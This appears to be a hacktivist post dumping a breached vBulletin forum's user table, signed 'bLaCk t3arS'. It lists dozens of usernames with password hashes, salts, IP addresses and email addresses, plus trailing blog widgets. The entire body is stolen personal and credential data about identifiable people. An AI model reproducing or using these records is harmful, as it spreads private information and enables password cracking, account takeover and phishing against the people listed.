Asif Ansari 9d0a5e3d0b1e223dc6766c5990c35584 115.186.72.90 G=P 
Asif brohi 37d19b5532db8d8d02017fcc7fba5b63 115.186.113.189 ,)c 
asif1253 09d914a00213412471d81419d31fee11 119.158.65.227 GMD 
Asim e1c5499fe589d1d39e76625bc2abe8c5 117.102.37.70 &nb 
asim79 d369871109c3d7395ff51d57e530c864 117.102.36.27 %um 
Asimio 9617b1b5ab2d4d395c1aa43cd2ef8d8c 203.81.207.61 %.+ 
asimriz 6ea2dcc784149191cf4d93231d80783d 119.152.42.109 iOg 
asma khan e97da5f47782861b6fbccf99db4a3f77 115.186.123.219 o1B 
AssineeRogs 2703847d1297a9e12bafdea7bc3e97d3 188.143.232.156 B#i 
ateeb_khan 5d015673b2ae63a7630c155df75e64c8 203.81.214.233 :&b 
atef f449ec3069576ade53b459aeb304f8df 117.102.16.202 _~x 
AtmomiEffigmA 3262ba2cdbc7f4087e0bc7004e687107 93.81.32.125 aG* 
atq08001 bda8a3ebcd40eb9816ded2a54303c1a6 193.11.131.99 Y8V 
avtaar 4cb10ebcbd3f54087264a51cf5a26574 92.228.143.37 Jfw 
awaisagha 6b88c0e826a88d0858ee2df8b38dc460 111.88.18.141 h0H 
awkath 0cb284c012a901cea12c9bd304753725 115.186.121.113 :1d 
ayn 9dace6f70e0b749bdce27994c9f7d7fe 119.158.115.64 !`7 
azambhabib 55debdedb2d77f916c6e495157776c6b 115.186.112.26 )D_ 
babar 93a5307dd0506082ea84f41dc103c086 115.186.64.165 B.2 
babar.munawar 10339b15999cc62f228d15d2ecb88e79 116.71.186.120 xk[ 
babar_good aab45a87391853f56f67782a29105d27 115.186.68.32 x\m 
bachelor 14635f5659f8ee62b9d613e9a377d751 203.81.210.153 6NZ 
barbarian cb944dae0a32dc25b7782eb37f7c8101 110.37.30.139 FzE 
barelvi786 c00e20157323a1bfe232083efa64d70d 115.186.122.92 &A. 
bari c4b57f8a02baa27cfb58c23acefe7083 116.71.165.250 }L* 
barkat 42b200c82f2bb9e5f39e9d1b1be3c42f 119.155.43.163 '{k 
Baron1 96025eb12f52e77423685c9fa206e6e7 119.158.4.189 }_; 
Beaupestype 3d3bcb7e1d3fdd5321ddbced211667f4 58.22.101.247 p6S 
berserker_pk 85057f3aed148e1d69c93382b47354aa 203.81.201.51 6TK 
bilal.akbar 9db23bada0f78b1e933c7c09e2caee09 115.186.121.35 Wx{ 
bilal14 b29903db373ac38441947c02bd95c2b4 115.186.68.117 _uH 
bilaladvani c6b425c3738161bef21bf3899e33d602 203.81.214.223 ru7 
bilaln786 69a4686b6a6dc25ed21823218cc2f865 117.102.56.1 K"= 
bilalt 576f1cda83891c822bc97436503120b8 115.186.21.90 ~Ds 
bilaltahir 613b8b5cc868c1ab9f9830296637f5db 117.102.43.44 n!L 
birdynatron 797b9e40dd2ad2924cd1b6296e521181 117.102.41.30 F.x 
Black pearl ab08e002f39a33af16e4edf1225f0495 203.81.201.193 )Wy 
==============================================================================================


Database Dumps
==============
Database: vbb
Table: user

username password email salt 
====================  ======================================  ======================= =========
!!drugs 0614c628229c0d422f20d698b40d8880 wmlviqr@rambler.ru ^{u 
!horeh b6e376ae28a2d0963a27241dd52639f9 ghorka01@gmail.com {S8 
#eCialis[tabs] d194e9313c9e1776da51f74b2063cebd mesejalenus@gmail.com "l5 
#konkurs[UKYCUYUYUYU] 35ec15f5b9569b0b144008d386510fc9 konkurs34@gmail.com \Pa 
#Makarez[LZSLLLZLSLZL] a5803f4a1b429e016f1e18bc6dc2a0ac midmak@rambler.ru EP; 
#marsem[SEMENOW] 29bf424f2591052a3696c8831adef12d mar989@rambler.ru wQd 
#mennick[LVVLLVLVLWWL] 5cc321538f423bcd82ec962bb5703514 steve@cheap-quotes.info kbK 
#nancy[CJDCCCJGCCCJ] 0a0ca74b0a634249558c28eb7eaa3085      ifeelsopeaceful@gmail.com hU7 
#Online Investment 4ccb40cf26da3bff5c228c7f523aa020 sdweders12a@gmail.com A.T 
#Rating Casino Online 7e9063cf7f631806abc2955eac84428a       carriebracco61@gmail.com 'NC 
#valera-[VVHVHFHLHHLH] f272dea66ad731bbdee42e9753e90751 excidwini@gmail.com 5mZ 
$t()n!) 0d0e3777ee499df305476c7e03cea5ce par1@go4b.net Zvl 
)V(3G4(|3T}{.xD 47f8c43d9e3649165b701353b99140aa guitar_h3ro32@yahoo.com [<{ 
1233Abdigon320 a1696b6df9674d1a7c4034e67238c54f evesireermefe@mail.ru b`B 
1295035@mail.ru 9ffe5f9b57e4bb3eb8d22774da9825e1 1295035@mail.ru L=~ 
1ceMaster 85f5ad7a2f89e3dca768cb3b3cd7ce8f hasnainp@go4b.net.pk x4` 
7arhan 5973756e5b2816a191a2ef325387cd1e farhan@go4b.net.pk TTR 
9mm 31bd1b79b672feefd8b8a781717cf8d5 khurram.saleem@gmail.com N58 
:::&gt;Taz&lt;::: cf390ab8e16f9e971c66b1bf851096d7 murtazat@go4b.net.pk .)6 
@ Casino 844b5f0a26dbc877b03f75b401c893f1 ai260489@gmail.com {Gp 
@gh@ 9ec72f6ba264be05dd671dc55c374a8c tareens@go4b.net T]6 
a7rt822 49f0bf74893af05aa1dab116d293ac4d a7rt387@gmail.com z=3 
AAABBEES a898e0cd7abadd1c7aa3594693419db5 janycumma@gmail.com !*/ 
aaahmedid1 f464df7fcb2192cf336f207a874166e4 aaahmedid1@gmail.com +$R 
Aaalister 3528e83b5e589a500b74981b0c6c4b92 aaalister@gmail.com ,|z 
aaannbarkerrr 899146c839523341b84853ba2a7f4626 annbarker33@gmail.com ffN 
AAArthurs 3f389bfa42fc4e6e9af2941941fa052f onlinehost@gmail.com RV` 
aaa_no_spyware 02cf69fdd640a564bb9e939688301118 so.cialposter3@gmail.com ~ft 
aadryant 193c2f1a13ff3b91a99223f9ead438a5 dryant54@gmail.com &(C 
AAFabishepisa 0cffb1e236318d19b87b4836006434ff Assexognosumn@2008votedsites.net 7+u 
aah255 959a324f9a3242be92970c29992e8669 amirali@go4b.net.pk 0jz 
AAIdosseRot 3f6823cc7829d21321e3ecdf7f61ac1e immusperm@2008votedsites.net 'eW 
AAinfismish 7258b7212a6f6f74bd02f452a2047687 Bleareemapy@2008ratedsites.net }*s 
AAJedgecepecind b850eb5769dec933f6df67c45251761e actittaming@2008votedsites.net @iv 
AAJersey e82aba5f653392f48619f556b3ce1c2a GenoToonitalt@2010go4.biz {`H 
AAkitincilk 863369a5514e0c88c66dcb8e492b5e5b choifftiest@2009news5.biz 4mC 
aalenady 9f5f402517bd4758f470548888fee826 selenadyck5@gmail.com 6'^ 
AaronHerbz78 010e1ea51240961832867b0375dbc49d rissharpedw@gmail.com C*/ 
aarsalan a521a1f6c58e834783689fd266aad739 arsalanjann@live.com (#+ 
Aasonstawnosawf 80971af87c70153bc4997eeff9adc6ef fan@anti-anxiety-pills.com Vc^ 
Aasonstawnosawvbv 3a3020cedc381f9f7fa1e9ba47f70463 olonlsdad@online-discount-pharmacy1.com ~Uv 

AAsoxowsZewA 6ba1c7dfcda97e88e4c7a03caf023129 unsenofloum@2009ok2.biz pQq 
aasqwszx d04bae630569972a9816ee8424cc4506 infu.bu.s@gmail.com MaP 
aassdfg db2347037789f941c6fa344f4cc4d066 aassdfg@mail.ru nq" 
abadeolve a1391ee22f5294fe8dd9c98bae4016dd weairener@mail.ru RWM 
aballormA e40e61f92c54a2f2a1ee9b6c7bb101a5 573@83up.com )MR 
==============================================================================================

submitted by bLaCk t3arS - Crying for our motherland India


[...]

Continue

Total Pageviews

Popular Posts